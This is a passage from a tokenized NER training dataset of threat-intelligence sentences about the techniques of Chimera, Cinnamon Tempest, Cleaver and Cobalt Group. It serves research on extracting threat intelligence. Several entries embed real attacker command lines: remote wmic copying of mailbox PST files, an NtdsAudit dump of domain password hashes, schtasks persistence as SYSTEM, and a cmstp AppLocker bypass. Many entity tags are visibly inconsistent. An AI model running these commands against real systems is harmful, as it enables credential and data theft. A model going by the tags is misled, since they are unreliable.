"O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "I-OffAct", "O" ] }, { "tokens": [ "Chimera", "has", "used", "side", "loading", "to", "place", "malicious", "DLLs", "in", "memory." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "B-Way", "B-Way", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "Cobalt", "Strike", "to", "encapsulate", "C2", "in", "DNS", "traffic." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "collected", "data", "of", "interest", "from", "network", "shares." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "has", "used", "<code>net", "user", "/dom</code>", "and", "<code>net", "user", "Administrator</code>", "to", "enumerate", "domain", "accounts", "including", "administrator", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "compromised", "domain", "accounts", "to", "gain", "access", "to", "the", "target", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera's", "malware", "has", "altered", "the", "NTLM", "authentication", "program", "on", "domain", "controllers", "to", "allow", "Chimera", "to", "login", "without", "a", "valid", "credential." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "<code>nltest", "/domain_trusts</code>", "to", "identify", "domain", "trust", "relationships." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Purp", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "Cobalt", "Strike", "C2", "beacons", "for", "data", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "I-Tool", "O", "I-Purp", "O" ] }, { "tokens": [ "Chimera", "has", "exfiltrated", "stolen", "data", "to", "OneDrive", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "legitimate", "credentials", "to", "login", "to", "an", "external", "VPN,", "Citrix,", "SSH,", "and", "other", "remote", "services." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "performed", "file", "deletion", "to", "evade", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "utilized", "multiple", "commands", "to", "identify", "data", "of", "interest", "in", "file", "and", "directory", "listings." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "remotely", "copied", "tools", "and", "malware", "onto", "targeted", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "copied", "tools", "between", "compromised", "hosts", "using", "SMB." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Chimera", "has", "used", "<code>net", "user</code>", "for", "account", "discovery." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "staged", "stolen", "data", "locally", "on", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "harvested", "data", "from", "victim's", "e-mail", "including", "through", "execution", "of", "<code>wmic", "/node:<ip>", "process", "call", "create", "\"cmd", "/c", "copy", "c:\\Users\\<username>\\<path>\\backup.pst", "c:\\windows\\temp\\backup.pst\"", "copy", "\"i:\\<path>\\<username>\\My", "Documents\\<filename>.pst\"", "copy</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "<code>net", "localgroup", "administrators</code>", "to", "identify", "accounts", "with", "local", "administrative", "rights." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "renamed", "malware", "to", "GoogleUpdate.exe", "and", "WinRAR", "to", "jucheck.exe,", "RecordedTV.ms,", "teredo.tmp,", "update.exe,", "and", "msadcs1.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Chimera", "has", "registered", "alternate", "phone", "numbers", "for", "compromised", "users", "to", "intercept", "2FA", "codes", "sent", "via", "SMS." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "gathered", "the", "SYSTEM", "registry", "and", "ntds.dit", "files", "from", "target", "systems.", "Chimera", "specifically", "has", "used", "the", "NtdsAudit", "tool", "to", "dump", "the", "password", "hashes", "of", "domain", "users", "via", "<code>msadcs.exe", "\"NTDS.dit\"", "-s", "\"SYSTEM\"", "-p", "RecordedTV_pdmp.txt", "--users-csv", "RecordedTV_users.csv</code>", "and", "used", "ntdsutil", "to", "copy", "the", "Active", "Directory", "database." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "direct", "Windows", "system", "calls", "by", "leveraging", "Dumpert." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "the", "<code>get", "-b", "<start", "ip>", "-e", "<end", "ip>", "-p</code>", "command", "for", "network", "scanning", "as", "well", "as", "a", "custom", "Python", "tool", "packed", "into", "a", "Windows", "executable", "named", "Get.exe", "to", "scan", "IP", "ranges", "for", "HTTP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Chimera", "has", "used", "<code>net", "share</code>", "and", "<code>net", "view</code>", "to", "identify", "network", "shares", "of", "interest." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "dumped", "password", "hashes", "for", "use", "in", "pass", "the", "hash", "authentication", "attacks." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O", "B-Org", "I-OffAct", "O" ] }, { "tokens": [ "Chimera", "has", "used", "the", "NtdsAudit", "utility", "to", "collect", "information", "related", "to", "accounts", "and", "passwords." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "multiple", "password", "spraying", "attacks", "against", "victim's", "remote", "services", "to", "obtain", "valid", "user", "and", "administrator", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-OffAct", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "I-Purp", "O" ] }, { "tokens": [ "Chimera", "has", "used", "PowerShell", "scripts", "to", "execute", "malicious", "payloads", "and", "the", "DSInternals", "PowerShell", "module", "to", "make", "use", "of", "Active", "Directory", "features." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "<code>tasklist</code>", "to", "enumerate", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "encapsulated", "Cobalt", "Strike's", "C2", "protocol", "in", "DNS", "and", "HTTPS." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Chimera", "has", "queried", "Registry", "keys", "using", "<code>reg", "query", "\\\\<host>\\HKU\\<SID>\\SOFTWARE\\Microsoft\\Terminal", "Server", "Client\\Servers</code>", "and", "<code>reg", "query", "\\\\<host>\\HKU\\<SID>\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet", "Settings</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Chimera", "has", "staged", "stolen", "data", "on", "designated", "servers", "in", "the", "target", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "RDP", "to", "access", "targeted", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "harvested", "data", "from", "remote", "mailboxes", "including", "through", "execution", "of", "<code>\\\\<hostname>\\c$\\Users\\<username>\\AppData\\Local\\Microsoft\\Outlook*.ost</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "utilized", "various", "scans", "and", "queries", "to", "find", "domain", "controllers", "and", "remote", "services", "in", "the", "target", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "Windows", "admin", "shares", "to", "move", "laterally." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "scheduled", "tasks", "to", "invoke", "Cobalt", "Strike", "including", "through", "batch", "script", "<code>schtasks", "/create", "/ru", "\"SYSTEM\"", "/tn", "\"update\"", "/tr", "\"cmd", "/c", "c:\\windows\\temp\\update.bat\"", "/sc", "once", "/f", "/st</code>", "and", "to", "maintain", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Org", "B-Tool", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "PsExec", "to", "deploy", "beacons", "on", "compromised", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "collected", "documents", "from", "the", "victim's", "SharePoint." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "`fsutil", "fsinfo", "drives`,", "`systeminfo`,", "and", "`vssadmin", "list", "shadows`", "for", "system", "information", "including", "shadow", "volumes", "and", "drive", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "ipconfig,", "Ping,", "and", "<code>tracert</code>", "to", "enumerate", "the", "IP", "address", "and", "network", "environment", "and", "settings", "of", "the", "local", "host." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "<code>netstat", "-ano", "|", "findstr", "EST</code>", "to", "discover", "network", "connections." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "the", "<code>quser</code>", "command", "to", "show", "currently", "logged", "on", "users." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "<code>net", "start</code>", "and", "<code>net", "use</code>", "for", "system", "service", "discovery." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "<code>time", "/t</code>", "and", "<code>net", "time", "\\\\ip/hostname</code>", "for", "system", "time", "discovery." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "a", "Windows", "version", "of", "the", "Linux", "<code>touch</code>", "command", "to", "modify", "the", "date", "and", "time", "stamp", "on", "DLLs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "obtained", "and", "used", "tools", "such", "as", "BloodHound,", "Cobalt", "Strike,", "Mimikatz,", "and", "PsExec." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Tool", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Chimera", "has", "used", "a", "valid", "account", "to", "maintain", "persistence", "via", "scheduled", "task." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "HTTPS", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "the", "Windows", "Command", "Shell", "and", "batch", "scripts", "for", "execution", "on", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "WMIC", "to", "execute", "remote", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "WinRM", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "used", "search", "order", "hijacking", "to", "launch", "Cobalt", "Strike", "Beacons." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "abused", "legitimate", "executables", "to", "side-load", "weaponized", "DLLs." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "used", "weaponized", "DLLs", "to", "load", "and", "decrypt", "payloads." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "obtained", "highly", "privileged", "credentials", "such", "as", "domain", "administrator", "in", "order", "to", "deploy", "malware." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct", "B-OffAct" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "uploaded", "captured", "keystroke", "logs", "to", "the", "Alibaba", "Cloud", "Object", "Storage", "Service,", "Aliyun", "OSS." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "exploited", "multiple", "unpatched", "vulnerabilities", "for", "initial", "access", "including", "vulnerabilities", "in", "Microsoft", "Exchange,", "Manage", "Engine", "AdSelfService", "Plus,", "Confluence,", "and", "Log4j." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "maintained", "leak", "sites", "for", "exfiltrated", "data", "in", "attempt", "to", "extort", "victims", "into", "paying", "a", "ransom." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "used", "Group", "Policy", "to", "deploy", "batch", "scripts", "for", "ransomware", "deployment." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "O" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "downloaded", "files,", "including", "Cobalt", "Strike,", "to", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "used", "PowerShell", "to", "communicate", "with", "C2,", "download", "files,", "and", "execute", "reconnaissance", "commands." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "used", "the", "Iox", "and", "NPS", "proxy", "and", "tunneling", "tools", "in", "combination", "create", "multiple", "connections", "through", "a", "single", "tunnel." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "B-Tool", "B-Tool", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "used", "a", "customized", "version", "of", "the", "Iox", "port-forwarding", "and", "proxy", "tool." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "used", "a", "customized", "version", "of", "the", "Impacket", "wmiexec.py", "module", "to", "create", "renamed", "output", "files." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "used", "SMBexec", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "deployed", "ransomware", "from", "a", "batch", "file", "in", "a", "network", "share." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "used", "open-source", "tools", "including", "customized", "versions", "of", "the", "Iox", "proxy", "tool,", "NPS", "tunneling", "tool,", "Meterpreter,", "and", "a", "keylogger", "that", "uploads", "data", "to", "Alibaba", "cloud", "storage." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "I-Tool", "B-Way", "I-Tool", "O", "B-Way", "I-Tool", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "used", "compromised", "user", "accounts", "to", "deploy", "payloads", "and", "create", "system", "services." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "executed", "ransomware", "using", "batch", "scripts", "deployed", "via", "GPO." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "used", "Impacket", "for", "lateral", "movement", "via", "WMI." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Cinnamon", "Tempest", "has", "created", "system", "services", "to", "establish", "persistence", "for", "deployed", "tooling." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cleaver", "has", "used", "custom", "tools", "to", "facilitate", "ARP", "cache", "poisoning." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "B-Way", "I-Purp", "O" ] }, { "tokens": [ "Cleaver", "has", "been", "known", "to", "dump", "credentials", "using", "Mimikatz", "and", "Windows", "Credential", "Editor." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Tool", "B-SecTeam", "B-Tool" ] }, { "tokens": [ "Cleaver", "has", "created", "customized", "tools", "and", "payloads", "for", "functions", "including", "ARP", "poisoning,", "encryption,", "credential", "dumping,", "ASP.NET", "shells,", "web", "backdoors,", "process", "enumeration,", "WMI", "querying,", "HTTP", "and", "SMB", "communications,", "network", "interface", "sniffing,", "and", "keystroke", "logging." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Features", "B-Features", "B-Way", "B-HackOrg", "B-Way", "B-Tool", "B-Tool", "B-Tool", "I-Features", "B-HackOrg", "B-Way", "B-HackOrg", "B-Way", "O", "B-Tool", "O", "I-Features", "I-Features", "O", "O", "B-HackOrg", "B-Features" ] }, { "tokens": [ "Cleaver", "has", "created", "fake", "LinkedIn", "profiles", "that", "included", "profile", "photos,", "details,", "and", "connections." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cleaver", "has", "obtained", "and", "used", "open-source", "tools", "such", "as", "PsExec,", "Windows", "Credential", "Editor,", "and", "Mimikatz." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "B-Way" ] }, { "tokens": [ "Cobalt", "Group", "has", "used", "the", "Plink", "utility", "to", "create", "SSH", "tunnels." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "bypassed", "UAC." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "used", "the", "command", "<code>cmstp.exe", "/s", "/ns", "C:\\Users\\ADMINI~W\\AppData\\Local\\Temp\\XKNqbpzl.txt</code>", "to", "bypass", "AppLocker", "and", "launch", "a", "malicious", "script." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "obfuscated", "several", "scriptlets", "and", "code", "used", "on", "the", "victim’s", "machine,", "including", "through", "use", "of", "XOR", "and", "RC4." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "compromised", "legitimate", "web", "browser", "updates", "to", "deliver", "a", "backdoor." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "used", "DNS", "tunneling", "for", "C2." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "sent", "malicious", "Word", "OLE", "compound", "documents", "to", "victims." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-SamFile", "B-Way", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "had", "exploited", "multiple", "vulnerabilities", "for", "execution,", "including", "Microsoft’s", "Equation", "Editor", "(CVE-2017-11882),", "an", "Internet", "Explorer", "vulnerability", "(CVE-2018-8174),", "CVE-2017-8570,", "CVE-2017-0199,", "and", "CVE-2017-8759." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "B-Features", "B-Features", "B-Features", "O", "B-Features" ] }, { "tokens": [ "Cobalt", "Group", "has", "used", "exploits", "to", "increase", "their", "levels", "of", "rights", "and", "privileges." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "deleted", "the", "DLL", "dropper", "from", "the", "victim’s", "machine", "to", "cover", "their", "tracks." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-SecTeam", "O", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "used", "public", "sites", "such", "as", "github.com", "and", "sendspace.com", "to", "upload", "files", "and", "then", "download", "them", "to", "victim", "computers.", "The", "group's", "JavaScript", "backdoor", "is", "also", "capable", "of", "downloading", "files." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "B-Way", "B-Tool", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "executed", "JavaScript", "scriptlets", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "added", "persistence", "by", "registering", "the", "file", "name", "for", "the", "next", "stage", "malware", "under", "<code>HKCU\\Environment\\UserInitMprLogonScript</code>." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "sent", "emails", "containing", "malicious", "attachments", "that", "require", "users", "to", "execute", "a", "file", "or", "macro", "to", "infect", "the", "victim", "machine." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "sent", "emails", "containing", "malicious", "links", "that", "require", "users", "to", "execute", "a", "file", "or", "macro", "to", "infect", "the", "victim", "machine." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "leveraged", "an", "open-source", "tool", "called", "SoftPerfect", "Network", "Scanner", "to", "perform", "network", "scanning." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "used", "<code>odbcconf</code>", "to", "proxy", "the", "execution", "of", "malicious", "DLL", "files." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "used", "powershell.exe", "to", "download", "and", "execute", "scripts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "injected", "code", "into", "trusted", "processes." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "I-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "used", "the", "Plink", "utility", "to", "create", "SSH", "tunnels." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "used", "Registry", "Run", "keys", "for", "persistence.", "The", "group", "has", "also", "set", "a", "Startup", "path", "to", "launch", "the", "PowerShell", "shell", "command", "and", "download", "Cobalt", "Strike." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Cobalt", "Group", "has", "used", "regsvr32.exe", "to", "execute", "scripts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "used", "the", "Ammyy", "Admin", "tool", "as", "well", "as", "TeamViewer", "for", "remote", "access,", "including", "to", "preserve", "remote", "access", "if", "a", "Cobalt", "Strike", "module", "was", "lost." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "B-Way", "O", "I-OffAct", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "used", 